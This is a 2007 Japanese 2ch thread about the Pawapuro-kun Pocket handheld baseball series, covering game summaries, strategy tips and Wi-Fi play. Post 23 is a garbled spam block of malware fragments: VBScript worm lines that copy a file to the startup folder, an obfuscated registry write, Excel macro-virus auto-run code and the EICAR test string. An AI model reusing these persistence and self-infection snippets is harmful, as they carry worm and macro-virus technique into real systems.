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パワプロクンポケット総合 56

1 :枯れた名無しの水平思考:2007/10/08(月) 12:03:20 ID:pXXGjMBG0
パワプロクンポケットシリーズについての情報の交換や雑談の
ためのスレッドです。過去のシリーズについての話もOKです。

質問する前に>>2-10辺りのテンプレや>>1のサイトを見るなり自分で調べてからにしましょう。
質問しなくとも>>2-10あたりはちゃんと読みましょう。

専用のスレがあるネタ(キャラ萌え・音楽など)は
そちらでお願いします。本スレでは自粛してください。
「スレ立て乙」以外は前スレを使い切ってから書き込みましょう。
荒らし、厨房、糞コテはスルーでムード○
自分の気に入らないレスはNGワードに登録するなり脳内で、各自あぼ〜んして下さい。
煽ったり、相手にするのはスレが荒れる原因になるので、そんな奴は不吉ババアの呪いで逝って下さい。

関連スレを立てる時は、住人に相談しましょう。
sage進行こそが同志達との約束
是非s a g eでお願いします。
(※sage取得法:E-mail欄に[sage]と入力)

▼前スレ
パワプロクンポケット総合 55
http://game11.2ch.net/test/read.cgi/handygame/1190781781/


▼テンプレサイト
ttp://www.geocities.jp/poketen_2ch/

▼GBA パワポケダッシュ 発売中 価格 4,980円(税込み 5,229円)
ttp://www.konami.jp/gs/game/poke/dash/
▼NDS あつまれ!パワプロクンのDS甲子園 発売中 価格 4,980円(税込み 5,229円)
ベスト版も発売中 2,800円(税込2,940円)
ttp://www.konami.jp/gs/game/poke/dskoushien/
▼NDS パワプロクンポケット9 発売中 価格:4,980円(税込5,229円)
ttp://www.konami.jp/gs/game/poke/9

▼関連スレ
パワプロクンポケット萌えスレ 19夜目
http://game11.2ch.net/test/read.cgi/pokechara/1189688523/

パワプロクンポケットの音楽について語ろう part2
http://game12.2ch.net/test/read.cgi/gamemusic/1174615951/

2 :枯れた名無しの水平思考:2007/10/08(月) 12:04:46 ID:pXXGjMBG0
◆公式サイト◆
パワポケ総合サイト(パワプロ通信のパワポケ版)
ttp://www.konami.jp/gs/game/poke/

◆過去のシリーズの公式サイト◆
ttp://www.konami.jp/gs/game/poke/1_2/
ttp://www.konami.jp/gs/game/poke/3/
ttp://www.konami.jp/gs/game/poke/4/
ttp://www.konami.jp/gs/game/poke/5/
ttp://www.konami.jp/gs/game/poke/6/
ttp://www.konami.jp/gs/game/poke/7/
ttp://www.konami.jp/gs/game/poke/koushien/
ttp://www.konami.jp/gs/game/poke/8/

◆歴代シリーズ攻略サイト◆
ttp://www.hero-k.com/ (全シリーズ)
ttp://poke5.k-server.org/menu.html  (ポケ5)
ttp://ground.moo.jp/pawapoke6/index.htm (ポケ6)
ttp://rosukety.fc2web.com/pawapoke.htm (甲子園)
ttp://www.ureha.com/wiki/pawapoke8/ (ポケ8)
ttp://www23.atwiki.jp/poke9/pages/1.html (ポケ9)
ttp://yos.s28.xrea.com/ (更新停止)
ttp://www.geocities.jp/pawapoke_matome/ (更新停止)

◆お絵描き板@萌えスレ◆
ttp://cat.oekakist.com/4869/
ttp://www.degitalscope.com/~mbspro/userfiles_res/poketen2ch/

《4、5、6、7、1・2・ダッシュ共通全データ消去方法》
電源を入れて最初のコナミのロゴでL、十字キー上、スタート、セレクトを4秒ほど同時押し。成功すると効果音が出ます。
8・9はコナミロゴ画面でしばらくLとRとXボタンを押しっぱなし。
GBCの1、2、GBAの3は不明。

3 :枯れた名無しの水平思考:2007/10/08(月) 12:05:40 ID:pXXGjMBG0
Q.各シリーズの特徴教えれ

A.
パワポケ1(GBC)
パーツ制サクセス以外で唯一投手も任意に野手能力伸ばせる作品。
12回で練習ボーナス特殊能力ももらえるし、初期能力高いしで
強い選手が作りやすい。ただ、エラー率が何故かG1固定なため
守備させるとみなファンタジスタなのがなんとも…。
ストーリーは可もなく不可もなくといった感じ。

パワポケ2(GBC)
未だに根強い人気を誇る作品。
ダイジョーブ次第では表だけでも そこそこ強い選手を作成可能。
「転生システム(通信によってサクセス選手を再育成可)」を
繰り返す事によりALLmaxも可能。
裏は戦争編。「任務」をこなすことによって
経験点をためることにより選手を育成する。
「呪島」(マインスイーパーで特能&経験点&アイテムゲット)が
得意ならば強い選手も作れる。
抑え投手などが作り易いか。

パワポケ3(GBA)
初のパーツ制サクセス。人によって賛否が激しく分かれる作品。
裏の地雷ゲーム(2の呪島と同じ、 サクセス選手も再育成可)を併用する事により、
ALLmax&特能いっぱいな選手を作る事が可能。
ゲームの性質上持ち物を高額パーツで埋める事が多くなるので、
理不尽イベントによって壊され GBAぶん投げる人多数。
ただしうまく行けば全作品中で一番強い選手が作れる。

パワポケ4(GBA)
比較的人気のある作品。ストーリー、音楽ともかなりハイレベル。
表は投手をやってるとほぼ必ず「一発」が付くのが珠に瑕だが
(よろず屋で「幸福のボール」を買う事により消す事は可能)、
慣れればそれなりに強い選手もできる。
裏はパーツ制RPG。「のりか理論」等により
楽にALLmax&威圧感+αの選手を作る事が可能。

4 :枯れた名無しの水平思考:2007/10/08(月) 12:06:31 ID:pXXGjMBG0
パワポケ5(GBA)
これも人気のある作品。この作品くらいから野球部分が面白くなった。
表は恐らく全シリーズ中1番簡単。活躍次第では表だけでもかなりの
選手が作れる。パチンコ通い等により三種の神器
(よくとぶバット、ナイスなグラブ、速いスパイク)が揃え易いのも良い。
裏は4と同じくパーツ制RPG。難易度は4よりは難化。しかしコツを掴めば
4を超える強い選手が作れる。
またこの作品から「俺のペナント(俺ペナ)」が登場。
サクセス選手を3回まで 再育成でき、レベルに関係なくタイトル獲得で
強力な特殊能力(パワーヒッターなど)が取得可能なため、
裏サクセスと組み合わせる事により最強選手育成も可能。

パワポケ6(GBA)
強い選手が作りにくい(特に表)ため、評価の分かれる作品。
単純にできる選手の強さからいけば、恐らくシリーズ史上最弱。
しかしストーリーの面白さ、キャラの濃さ等により一部には
根強い人気がある。
裏は2以来久々の非パーツ制。カジノの登場により、目押しできる人は
かなり強い選手が作れる。カジノを使わなくても、慣れればALLB前後の
選手は作れる。
俺ペナは育成回数が1回にダウン。取得できる特殊能力もかなり限定された。
今回から「強振多用」などのCOM操作時の特殊能力が取得可能。
なお、野球部分は一番評価が高い。

パワポケ1・2(GBA)
1と2のリメイク版。基本的なシステムは6を踏襲。
GB版に比べると、強い選手は作りにくくなった。
特に1は練習ボーナスの特殊能力が「12回→40回」に
変更になったため、ほぼ取得不可能に。
それでも6に比べれば強い選手は作成可能。
2裏、転生システムも健在。俺ペナ有り。

パワポケ7(GBA)
センター前に抜けた当たりで一塁走者が二塁で刺されたり、
バントで不自然にスタートダッシュが遅かったりと、
なにかと野球部分に不満が残る作品。それでも前作まであった三盗技等は解消された。
今回は真エンドを見なければ選手の所属球団が選べない。
表は選手登録までならヒーロー使えば簡単。
しかし強い選手を作ろうとすると一気に難度があがる。
裏はお馴染みのパーツ制RPG。
カジノがあるので、6で慣れている人ならば簡単に強い選手が作れる。
カジノを使わずともコツさえ掴めばハイレベル選手は育成可能。時間がかかるのが難点か。
俺ペナは今回も有り。任意の特殊能力取得が可能になったため、再現選手などが作り易くなった。
また、初期ROMでは禁断の「幸せ草バグ」を使う事により、
パスワード選手等を思いのままに何度でも育成できる。
パワポケポイントバグも存在。何かとバグの多い作品でもある。


5 :枯れた名無しの水平思考:2007/10/08(月) 12:07:32 ID:pXXGjMBG0
パワポケ甲子園(NDS)
パワポケシリーズ初の実況搭載。今作はシナリオが存在せず、
全国各地の高校から予選を勝ち抜いて甲子園に行くという内容。
そのため、キャラ固有のイベントが無い。
難易度はかなり高く、一回の平均プレー時間もパワポケシリーズでは最長。
野球に関してはこれまでのGBAシリーズを踏襲している。

パワポケ8(NDS)
球場が3D化し、野球部分が大幅に改善。ステータスに弾道とエラーが追加され、
システムは本家パワプロに近づいた。
選手を作る難易度は高くなく、一定の評価値を得るだけで選手が登録出来る。
(ただし、犯人を見つけないと球団選択は不可)
新登場の勉強システムをうまく使えばクセのある選手も作成可能
裏サクセスは地雷ステージオンリー。当然だが、進めば進むほど強い選手が作成出来る。
前作には無かった使用タイミングを選ぶことのできる補助アイテムの存在が追加された

パワポケ9(NDS)
サクセスが3本になり、ボリュームも大幅にアップした。
表では初の1日単位で進行するサクセス。
従来通りの「アクション野球」と、「パワポケダッシュ」から
採用された「カード野球」から
好きな方を選べる。難易度はやや低めか。
裏サクセスはお馴染みパーツ制RPG。「ワームホール理論」により、
簡単にALLmax選手を作成可能。
第3のサクセスとしてミニサクセス「少森寺編」も収録。
できる選手のレベルは他2つに比べると低いものの、
俺ペナ参加時に「センス○」取得の恩恵も。
俺ペナは従来の1年から(活躍すれば)2年に延長。
野球部分は比較的好評な模様。
ミートカーソルがパワプロと同じ楕円形に変更された。
また今回からウグイスコール設定も可能になった。

6 :枯れた名無しの水平思考:2007/10/08(月) 12:08:22 ID:pXXGjMBG0
パワポケダッシュ総評

表サクセスの良い所
・カードスロットシステムが新鮮
・仲間のEDが2つある
・ガールフレンドが萌える
・クリアもガールフレンドの攻略も楽
・メガネ一族は好評

表サクセスの悪い所
・ワンプレイが長い
・カードスロットシステムは戦略性が乏しい。目押し以外CPUの強さに流される運ゲー
・一部の特殊能力が強過ぎる<威圧感、奪三振、キレ○、ノビ○、重い球、打球反応…orz>
・2章Aルートの親父は糞過ぎ。キャットガールズは優遇されすぎ
・やる気が下がりやすい迷惑なイベント多過ぎ
・仲間とガールフレンドのEDのバランスが悪い
・イベントが全体的に少ない
・怪我率に関係なく怪我しやすい。天国メーターが上がりやすい

裏サクセスの良い所
・不思議のダンジョンのアイデア
・パワポケモンスター総出演
・親切設定のお助けキャラ
・超特殊能力が取得できる
・アイテム持ち越しを使えば強い選手が作れる

裏サクセスの悪い所
・使い回しのモンスター
・ワンプレイが長過ぎる
・劣化不思議のダンジョン
・防具と武器がすぐ壊れる
・カードや球が燃やされる
・階段が自力で行けない所にあることがある
・敵の攻撃力がインフレしすぎ。一部の敵が強過ぎ
・イベント&キャラが表サクセスより少ない。すぐ飽きる
・アイテムの引継ぎがクリア時のみ、やりこみ不可
・あいかわらず亀田がラスボス

その他
・パワポケ図鑑の出来は好評
・実在の選手は使えない
・本当に小学生向けに作ったのか?このソフトは?

7 :枯れた名無しの水平思考:2007/10/08(月) 12:09:13 ID:pXXGjMBG0
Q.パワポケ1・2で1のサクセスをクリアしても2のサクセスができないんですが。
A.ちゃんとした店でお金を出して買ってください。

おまけ DSとliteの明るさの差
ttp://arena.nikkeibp.co.jp/col/20060301/115626/01v.jpg
ttp://arena.nikkeibp.co.jp/col/20060301/115626/02v.jpg


関連スレ

実況パワフルプロ野球ポータブル2◎HR23本目
http://game11.2ch.net/test/read.cgi/handygame/1183549717/

■口■実況パワフルプロ野球Part173■口■
http://game11.2ch.net/test/read.cgi/gamespo/1186330057/

8 :sagee ◆5oTYnFGYew :2007/10/08(月) 12:10:00 ID:nX5v0t+VO
いちもつ

9 :枯れた名無しの水平思考:2007/10/08(月) 12:10:03 ID:pXXGjMBG0
パワポケ10 12月6日発売予定
ttp://www.konami.jp/pawa/poke10/index.html

野球が超進化!ポケットの中には、いつも野球がある!

●携帯ゲームの枠を超えたDSの野球!手にとり、遊べば驚くこと間違いなし!
・投手、打者・球場が3Dポリゴンになった!モーションが豊富になって野球がリアルになった!
・Wi−Fi対応!離れた友人と1対1の野球対戦ができる!全国ランキング表示もある!
・DSカード1枚で「パワポケ10」を持っていない友達ともダウンロード対戦ができるようになった!
・臨場感アップ!ガンガンしゃべる実況が導入!
・「カーブってどっちに曲がるの?」「この特殊能力はどういった効果があるの?」「インフィールドフライは?」
そういったプレイしているときの疑問に即回答!いつでも、どの画面からでも見ることのできる「パワポケ用語辞典」が実装!
・従来のコンピュータ難度「パワフル」で満足できなかった人向けに、その上をいく最強モードが追加!
・もちろん、操作性、コンピュータの思考も大幅アップ!

●もちろんサクセスも面白い!
・今回のお話の舞台は高校野球! 汗!涙!泥!目指せ甲子園!もう一つのサクセスも、もちろん面白い!

●ミニゲームも盛りだくさん!
カード野球、ペナント、俺のペナント、アレンジ、キャンプ、色々あってやりこみ要素満載、親切設計のパワポケ10は面白い!

10 :枯れた名無しの水平思考:2007/10/08(月) 12:45:36 ID:MS4R1Z5J0
>>1
>>8
ポケ10発売決定したからテンプレは8までだぜェ?ドンマ


11 :枯れた名無しの水平思考:2007/10/08(月) 12:57:02 ID:XNY1OjEk0
7裏は普段あまり役に立たないアルベルトが異常に役に立った
トムプソン強すぎだろ…

12 :枯れた名無しの水平思考:2007/10/08(月) 12:58:40 ID:nX5v0t+VO
ゴメソ><

13 :枯れた名無しの水平思考:2007/10/08(月) 13:03:30 ID:mVk8VwmE0
シリーズで一番面白いミニゲームはなんだろう

14 :枯れた名無しの水平思考:2007/10/08(月) 13:03:39 ID:RwFZR5MvO
あつまれパワプロクンのDS甲子園(普通版、Best price版)
ネット通さなくても知らない人とコード交換、チャット可能
あつパワのコード交換方法

まず、自分のコードを確認し、紙にメモる。
次に、通信広場の誰かと繋ぐで誰かが来るまで待つ。
誰かが来たら、挨拶など適当にした後に、定型文の『教えてくれませんか?』や『ちょっといいですか?』などと切り出して、定型文挨拶の欄の一番最後の数字を使って自分のコードを相手に伝える。
相手が理解してくれたならば、その後に相手もコードを教えてくれるので、紙にメモる。
最後に『いきましょう』などと言い、部屋から出る。
その後、Wi-Fi切断し、さっきのコードを登録しもう一度通信広場のWi-Fiを繋ぐ。
今度は、友達と繋ぐで、広場を作るか、相手の広場に入る。
そうすると、定型文じゃなく自由にチャットできるようになるから、相手とルール決めた対戦したり、他のDSやWiiの友達コード聞いたり、雑談したりできる。

問題点は、リア厨と交換しちゃった時と、誰かと繋ぐで初心者と辺り、相手がコードだって理解してくれない時かな。

15 :枯れた名無しの水平思考:2007/10/08(月) 13:06:42 ID:RwFZR5MvO
前スレ>>965
俺は結構会えるけどなぁ
時間帯によって違うのかも
夕方とか夜とかなら割りと会えるよ

16 :枯れた名無しの水平思考:2007/10/08(月) 13:12:56 ID:MZ6MaUieO
>>1

今暇だったからGBC戦争やったら豪運炸裂で一発クリアした俺に一言!

てかまぁまぁ強いw

17 :枯れた名無しの水平思考:2007/10/08(月) 13:14:45 ID:Nyq/iscy0
ALLmaxって野手のことだよね?
投手じゃ無理な気が…

18 :枯れた名無しの水平思考:2007/10/08(月) 13:22:31 ID:X3e9Ml040
野球部分はおまけって人多いんだね!(前スレも読んだよ)
オレは6もしくは1&2で野球部分は、ほぼ完成してると思う(携帯機野球ゲームとして)

コンピュータ部分を(中日で例え)
1 投手起用を徹底させる(岩瀬はセーブ場面でしか出てこないとか、岡本は勝ってる試合時のみとか)
2 変化球の偏りをなくす&ストレート軽視反対!
3 1、2塁ランナーは3塁ストップ(ホームタッチアウト多すぎ)
4 バントする人と盗塁する人はあらかじめ設定(チームでなく個人でできる様に)
5 アレンジは6チームでなく12チームできる様に
6 最新メンバー

DS&3Dに期待してる人もいると思うけど
GBA&2Dでも↑の条件で十分すぎるくらい面白い携帯野球ゲームできる

でもみんなはサクセス重視なんだよね?

19 :枯れた名無しの水平思考:2007/10/08(月) 13:23:18 ID:5VYCBiq60
いいよ何回も蒸し返さなくても

20 :枯れた名無しの水平思考:2007/10/08(月) 13:25:52 ID:D0GDhaxx0
抑え登録してんのに3回あたりから起用されるからなぁ
もうただの中継ぎじゃん、ってぐらいに

21 :枯れた名無しの水平思考:2007/10/08(月) 13:25:58 ID:uZz4pz3p0
野球部分に力入れるよりサクセスに力入れた方が面白くなるからな

>>13
俺は箱グチャ

22 :枯れた名無しの水平思考:2007/10/08(月) 13:41:53 ID:89W06dEEO
>>11
アルベルトは(他作品に比べたら格段に)強いが、鈴音みたいな銃系は安定感に欠けるから大神、青野、うたの、タマちゃんが俺の中の四強
四弱は貴田、ふぐり、ようこ、紀香で満場一致で

>>13
見切ってシュッシュッしゅーが好き。というより迅雷コーチが好き。というよりタマちゃんが好き

23 :枯れた名無しの水平思考:2007/10/08(月) 13:53:40 ID:rtyxtyX10
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


24 :枯れた名無しの水平思考:2007/10/08(月) 14:05:42 ID:fdS7uI27O
ケチな俺は武田倉刈は回しっぱなし
時々珠子鈴音鋼アルベルト

25 :枯れた名無しの水平思考:2007/10/08(月) 14:08:01 ID:xEsCCeAN0
>>22
弾出る飛行機がなぜ出ない

26 :枯れた名無しの水平思考:2007/10/08(月) 14:19:23 ID:LhA1mFZa0
7裏は珠ちゃんと智美を・・・(*´Д`)ハァハァ

27 :枯れた名無しの水平思考:2007/10/08(月) 14:27:52 ID:NIHapiBc0
野球部分の強化とは違うかもしれないが先発中継ぎ抑えの起用を細かく設定できたらいいなとは思う
パワプロみたいに左のワンポイントとか

28 :枯れた名無しの水平思考:2007/10/08(月) 14:45:13 ID:z4160JXI0
9なんか先発がノックアウトされた時に抑えの切り札出してくるからな

29 :枯れた名無しの水平思考:2007/10/08(月) 14:49:55 ID:10I/q6l20
そもそも先発がノックアウトされたと判断するのが早すぎる

30 :枯れた名無しの水平思考:2007/10/08(月) 14:52:09 ID:LhA1mFZa0
3点取られたら自動的に交代は可哀想

31 :枯れた名無しの水平思考:2007/10/08(月) 14:53:26 ID:arg6t3t00
一回表にノーアウトで登板させられた時は吹いた

32 :枯れた名無しの水平思考:2007/10/08(月) 14:53:29 ID:vFJruoqs0
5たまでるびゅんびゅんのレベル4でだしてくるラスボスのぱんちの当たり判定よくわからないんだが
あのまるっこい部分だけあたっちゃだめなのか?
鎖の部分あたっても大丈夫なときとそうじゃないときがあるような気がするんだが誰か詳しい人教えてくだしあ

33 :枯れた名無しの水平思考:2007/10/08(月) 15:00:02 ID:tYbCgc3a0
10の裏サクセスは
ttp://www.geocities.jp/tabiteisyoku/spoke2.html
もうこれのパクリでいいよ

34 :枯れた名無しの水平思考:2007/10/08(月) 15:06:09 ID:6/2OsOjg0
>>18
ほぼ同意

35 :枯れた名無しの水平思考:2007/10/08(月) 15:06:10 ID:tY/bMWim0
>>22
パワーアップした珠ちゃんは最強

36 :枯れた名無しの水平思考:2007/10/08(月) 15:06:51 ID:ZnXrfVYy0
ヴァンパイアハンター編とかだったら面白そうだと思うけどな

37 :枯れた名無しの水平思考:2007/10/08(月) 15:09:23 ID:LhA1mFZa0
>>32
相手がガードしてるときのみ中心に水平な位置のみ丸っこい部分に当たっても大丈夫。
鎖は分からんが基本OUTじゃね?
このミニゲームだけはいつもスルーしてたww

38 :枯れた名無しの水平思考:2007/10/08(月) 15:13:10 ID:tY/bMWim0
10裏はPV見る限りではなんか掘ってないか?岩みたいなの
発掘編か?

39 :枯れた名無しの水平思考:2007/10/08(月) 15:39:56 ID:rfluRSbO0
6裏で目押しできねえなんかコツありますか?

40 :枯れた名無しの水平思考:2007/10/08(月) 15:51:52 ID:hxXgjfo00
正直サクセスはあまり期待してない
wifi対応だから買う。それだけ

41 :枯れた名無しの水平思考:2007/10/08(月) 15:54:16 ID:7jd5GPur0
流れ早いよ!なにやってんの!

42 :枯れた名無しの水平思考:2007/10/08(月) 15:54:17 ID:aqlFV/Tz0
wifi対応ってことだけで買うなら
集まれ甲子園の方がいいんじゃないかw?

43 :枯れた名無しの水平思考:2007/10/08(月) 15:59:00 ID:7jd5GPur0
>>42
あれは野球部分に難ありあり
球が上がり安すぎてパワーヒッターは基本的に役に立たない

44 :枯れた名無しの水平思考:2007/10/08(月) 16:12:54 ID:Mo7cK0BiO
あつ甲子園の野球は結構完成度高くて面白いと思うけどなあ。
打球の飛び方、肩の強さなんかがいい感じだし。
難点はムービングファスト系が厄介すぎるのと、外野フライ時にボールが視界から消える所くらい。
wifiって家でやるには何が必要?パソコン無しの自室でもできる?

45 :枯れた名無しの水平思考:2007/10/08(月) 16:16:24 ID:PW/txIj7O
正直野球関連はあまり期待してない
パワポケだから買う。それだけ

46 :枯れた名無しの水平思考:2007/10/08(月) 16:20:18 ID:LhA1mFZa0
エミュだとカード野球しか動かない件

47 :枯れた名無しの水平思考:2007/10/08(月) 16:23:31 ID:xEsCCeAN0
>>44
wifiをネットにつながってるパソコンに挿す必要がある
よってパソコンは必須条件

48 :枯れた名無しの水平思考:2007/10/08(月) 16:26:23 ID:7jd5GPur0
>>44
えー、そうか…
肩の違いについては同意

Wi-Fiは無線LANかもしくはWinXP+Wi-Fiコネクタが必要
詳細は任天堂公式見れ

通信可能な範囲は電波状況と間取りによる
ただ電波の受信状況はゲームの滑らかさに影響が出るから対戦相手としては
アクセスポイントのすぐ近くでやってほしいところ

49 :枯れた名無しの水平思考:2007/10/08(月) 16:35:32 ID:MTq+RoedO
8の射撃が難し杉
コツ教えてください

50 :枯れた名無しの水平思考:2007/10/08(月) 16:39:43 ID:5VYCBiq60
何回もやって慣れるしか
ワイドがあれば道中は楽

51 :枯れた名無しの水平思考:2007/10/08(月) 16:50:54 ID:izqBHd3+O
>>49
おみくじなら−1−1で大凶にして211で大吉

52 :枯れた名無しの水平思考:2007/10/08(月) 16:54:46 ID:OslL5C7N0
8で倉刈のアルバムだけ埋まっていないんで、10発売までに埋めようかと
数日前から始めたんだが厳しいね。部屋通って発生率上げてもダメだ。
しかしおかげでポイントが貯まるんで、オークションはグレード結構上げは結構順調。
オークション好きなんで10で復活してくれんかなぁ。ネタや解説文にニヤリとさせられる。

あと、彼女なし、真相暴かずの適当なプレイだと何ポイントくらいの選手を安定して作れる?
一応今は155CC4球種総変化10くらいで75P前後の選手で安定してるんだけど、
もっと効率の良い育成方があったらお聞きしたい。

>>49
「射撃」だとどっちか良く分からんが、
射的おみくじなら最前列or二列目の吉を縦列の前で待ち続ける。
ミニゲームならとりあえず攻略本。イベントで入手するもよし、持ち込むもよし。

53 :枯れた名無しの水平思考:2007/10/08(月) 17:15:29 ID:xEsCCeAN0
射撃おみくじは

自分が動くのではなく
狙った標的が来るのを動かずじっと待つ

これコツ

54 :枯れた名無しの水平思考:2007/10/08(月) 17:16:39 ID:vFJruoqs0
別にどっちでもよくね?

55 :枯れた名無しの水平思考:2007/10/08(月) 17:18:56 ID:Mo7cK0BiO
>>47>>48
サンクス。やっぱ駄目か・・・。

あつ甲子園のwifiって面白そうなんだよな。監督モードでどの選手を育てたとか分かって

56 :枯れた名無しの水平思考:2007/10/08(月) 17:54:55 ID:7jd5GPur0
ポケ10からミートの値で強振時のミートカーソルの大きさが変化するってホント?

57 :枯れた名無しの水平思考:2007/10/08(月) 18:53:14 ID:RwFZR5MvO
>>55
あつパワの野球はかなり面白いよな

Wi-Fiは店とかでもできるよ

58 :枯れた名無しの水平思考:2007/10/08(月) 19:16:41 ID:UT7nxI6gO
>>46
死ねカス

59 :枯れた名無しの水平思考:2007/10/08(月) 19:39:21 ID:HbZyCNmI0
いつのまにか新スレ立ってる
前スレの糞コテ結局スレ立てず逃げてるしwマゾ涙目wwwwww

60 :枯れた名無しの水平思考:2007/10/08(月) 19:43:40 ID:tY/bMWim0
>>56
wikiに載ってるんだから本当なんじゃない?

61 :枯れた名無しの水平思考:2007/10/08(月) 20:09:25 ID:Nyq/iscy0
前スレの965だっけ? 5日くらい繋いでも
誰もいなかったって言ってたの。
あつパワのコード交換スレにいってみたら?
そこは過疎ってるけど、俺は定期的に覗いてるから、そこでコード交換できるよ。

62 :枯れた名無しの水平思考:2007/10/08(月) 20:29:47 ID:2jP+JRNTO
>>56
お前がある掲示板の知り合いに見えて仕方ないがまあどうでもいいし間違いなく気のせいだろう

というか8の地雷でエリア100まで行けた奴とかいる?

63 :枯れた名無しの水平思考:2007/10/08(月) 20:32:13 ID:Yg/n//DC0
>>62
前スレに250まで言ったとかいう猛者が

64 :枯れた名無しの水平思考:2007/10/08(月) 20:54:46 ID:huAPEf/Z0
何その変態
普通にAllMaxなんだろうがな

65 :枯れた名無しの水平思考:2007/10/08(月) 20:57:28 ID:Yg/n//DC0
951 名前:枯れた名無しの水平思考[sage] 投稿日:2007/10/07(日) 22:08:20 ID:hWVxHPu2O
結局無限なんだっけ?
金全部アイテムに費やして頑張ったら250までは行けたけど4のオンパレードで誤爆した\(^o^)/
以来やってないな
次は300目指すか

前スレより

66 :枯れた名無しの水平思考:2007/10/08(月) 20:59:38 ID:huAPEf/Z0
変態は褒め言葉

67 :枯れた名無しの水平思考:2007/10/08(月) 21:02:37 ID:OslL5C7N0
前にあった地雷実況スレには100超えは普通にいたような。
覚えている限りじゃ300超えやオールマックス達成者もいた。
地雷スレ、マターリ進行していて結構好きだったな。9発売後に落ちちゃったけど。

地雷は評判悪いけど、たまに無性にやりたくなるんで
1ハードに1つある分には個人的にはむしろ嬉しい。1ハードで二度もやられちゃ困るけど。

68 :枯れた名無しの水平思考:2007/10/08(月) 21:06:32 ID:izqBHd3+O
ああそれ俺っす
多分俺じゃ250じゃALLMAXは無理かな…
アイテム買わないと行けないし拾おうと無理してたら爆死するし
まあ俺のスキルの問題だけど\(^o^)/

69 : ◆EEMkIwxJQE :2007/10/08(月) 21:16:24 ID:Iiklhpsc0
>>67
地雷30面以上での爆死の絶望感・虚しさは異常
費やした時間の長さにさらにガックリ

>>62
他の掲示板で馴れ合いっぽく書き込んでいると思うと、なんか引いた 
実際、ここで敬語を使わぬも、他のサイトにて敬語で馴れ合う人は他にもいるはず

2chの情報収集力+wiki参照の攻略  これでok

70 :枯れた名無しの水平思考:2007/10/08(月) 21:18:49 ID:7jd5GPur0
>>62
見ているところが一致していれば誰のことを言っているかはなんとなく分かるけど
俺はその書き込みを見てここで聞いただけ
その掲示板じゃ常にROMってる。理由は察しておくれ
この話はここまででよろすく、一応

地雷難しいわ
パターン集とかどっかにない?

71 : ◆EEMkIwxJQE :2007/10/08(月) 21:23:06 ID:Iiklhpsc0
>>70
>なんとなく分かるけど
これ、相手に対してなるべく優しく反論するための言葉
これを用いる多くは実際には分かっていない

72 :枯れた名無しの水平思考:2007/10/08(月) 21:27:49 ID:aqlFV/Tz0
ぶっちゃけ8の地雷は裏技使えば
カンストも余裕だしなw
オールマックスとかも楽勝

73 : ◆EEMkIwxJQE :2007/10/08(月) 21:28:09 ID:Iiklhpsc0
おっと>>70の釘打ちを見逃した 失礼
他にも「実際」この言葉を使いすぎだ・・・


ROMるわ

74 :枯れた名無しの水平思考:2007/10/08(月) 21:31:46 ID:4YpocVV00
パワプロ9やってたら、アルバムねえのかよとかエピローグねえのかよとか、つい思ってしまった
間違いなくポケ厨

75 :枯れた名無しの水平思考:2007/10/08(月) 21:58:00 ID:npQoT/Pg0
パワポケ4にて
改造コードでサクセスの年数バグらせて遊んでいたら
??年目の1月3週に制作途中?のイベント発生。

「イベントのテストです」

選択肢A西川→なぜか背景が新聞になり様々なイベントをテスト可能
   B井上→8種のランダムイベントのテスト
   C宮岡→神木、小山、堤の全イベント+ランダムイベント+エンディングのテスト
   D三浦→選択するとスルーで次の週へ


Cの宮岡のランダムテストで唯の春風パンチラてすとできたムハァ

76 :枯れた名無しの水平思考:2007/10/08(月) 22:43:14 ID:tY/bMWim0
>>62
百までいけたのはうれしかったがすごく虚しかったな
オールMAXができると虚しいわ
それから地雷もやってない しかもスコアにも99までしか記録されない

77 :枯れた名無しの水平思考:2007/10/08(月) 23:46:18 ID:c0rKULPmO
パワポケPで顔自由に変えられるって凄い楽しいな、GJ
強い木川とか強いさち作りまくり

これ6からあったの?6は評判良さげだからやってみようかな

78 :枯れた名無しの水平思考:2007/10/08(月) 23:50:46 ID:a6LeDmFS0
全員にウグイスと背番号つけないと気がすまない俺

79 :枯れた名無しの水平思考:2007/10/08(月) 23:51:36 ID:2vobxQErO
>>77
6は通好みだが、中毒性が異常に高い。
買うのを勧める

80 :枯れた名無しの水平思考:2007/10/09(火) 00:05:51 ID:lPNPFE9PO
さちが威圧感持ってるのにはワロタ
だがすぐに納得できた

81 :枯れた名無しの水平思考:2007/10/09(火) 00:10:43 ID:N9UyX5lc0
既存キャラ以外の顔を増やしてほしいな

82 :枯れた名無しの水平思考:2007/10/09(火) 00:16:15 ID:FYF0IyoP0
ポケで猪狩が出たのって1くらいだっけ?
プロ5と関係があるとはいえ、猪狩ってだけすごい普通な印象になる

83 :枯れた名無しの水平思考:2007/10/09(火) 00:20:43 ID:Q1j6a7hm0
進なら7で出た

84 :枯れた名無しの水平思考:2007/10/09(火) 00:22:52 ID:bgZGetQB0
>>82
対戦相手としてなら、2と5にも。

85 :枯れた名無しの水平思考:2007/10/09(火) 00:24:25 ID:d2Bw9tK80
前スレとかで切断厨とか話題に出てたのをみて思ったんだが

ともだちコードも対応しているようだし、切断厨対策など諸々にルールを設けて
大会を開催するってのはどうかな?
そうすれば、盛り上がるだろうし。
出来ないことは無さそうだが、どうだろうかね?

86 :枯れた名無しの水平思考:2007/10/09(火) 00:35:01 ID:PDAkIWEG0
>>77
俺は6の裏は全サクセスの中で最も好きだ。おすすめ。

>>85
やりたいね。ぜひ色々議論しようじゃないか。
もうルールが決まれば今からそれに向けての選手もつくれるしね。

